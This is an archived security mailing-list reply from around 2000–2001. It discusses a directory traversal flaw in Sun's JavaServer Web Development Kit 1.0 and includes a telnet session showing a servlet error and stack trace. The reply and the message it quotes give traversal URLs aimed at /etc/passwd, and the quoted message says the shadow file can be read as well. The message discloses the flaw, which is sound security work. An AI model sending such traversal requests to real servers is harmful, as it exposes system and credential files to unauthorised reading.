I found this some months ago ... it was posted to packetstorm... the moderators here let it slide for some reason. http://packetstormsecurity.org/0008-exploits/WDK_v1.0.vuln.txt ./ bugs in the Java Web server Development kit built in servlet engine http://localhost:8080/../../../../etc/passwd below is my version info. JavaServer(tm) WDK v1.0 EA [elguapo@localhost elguapo]$ telnet localhost 8080 Trying 127.0.0.1... Connected to localhost.localdomain. Escape character is '^]'. HEAD / HTTP/1.0 HTTP/1.0 500 Internal Server Error Date: Fri, 25 Aug 2000 14:24:54 GMT Server: JavaServer Web Dev Kit/1.0 EA with JSP/1.0 and Servlet/2.1 Content-Type: text/html Servlet-Engine: JavaServer Web Dev Kit/1.0 EA (JSP 1.0; Servlet 2.1; Java 1.3.0beta_refresh; Linux 2.2.15-4mdk i386; java.vendor=Sun Microsystems Inc.) <h1>Error: 500</h1> <b>Internal Servlet Error:</b><br> <pre> java.lang.ClassCastException: javax.servlet.http.NoBodyResponse at com.sun.web.core.RequestDispatcherImpl.forward(RequestDispatcherImpl.java:62) at com.sun.web.core.DefaultServlet.processFile(DefaultServlet.java:126) at com.sun.web.core.DefaultServlet.doGet(DefaultServlet.java:69) at javax.servlet.http.HttpServlet.doHead(HttpServlet.java:286) at javax.servlet.http.HttpServlet.service(HttpServlet.java:744) at javax.servlet.http.HttpServlet.service(HttpServlet.java:840) at com.sun.web.core.ServletWrapper.handleRequest(ServletWrapper.java:155) at com.sun.web.core.Context.handleRequest(Context.java:414) at com.sun.web.server.ConnectionHandler.run(ConnectionHandler.java:139) </pre> Connection closed by foreign host. [elguapo@localhost elguapo]$ -KF Phuong Nguyen wrote: > > Javaserver Web Dev Kit version 1.0 (JWSDK) > > JWSDK directory traversal vulnerability is found by > CHINANSL Security Advisory(CSA-200106), i want to add > another thing, it's also vulnerable to other operating > system like redhat 6.1 and this nasty bug allows you > to browse and read any file with ROOT previledge , so > you can read shadow file and stuff > > http://localhost:8080/../examples//WEB-INF/../../../../../ > > __________________________________________________ > Do You Yahoo!? > Make international calls for as low as $.04/minute with Yahoo! Messenger > http://phonecard.yahoo.com/
This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 14:11:15 PDT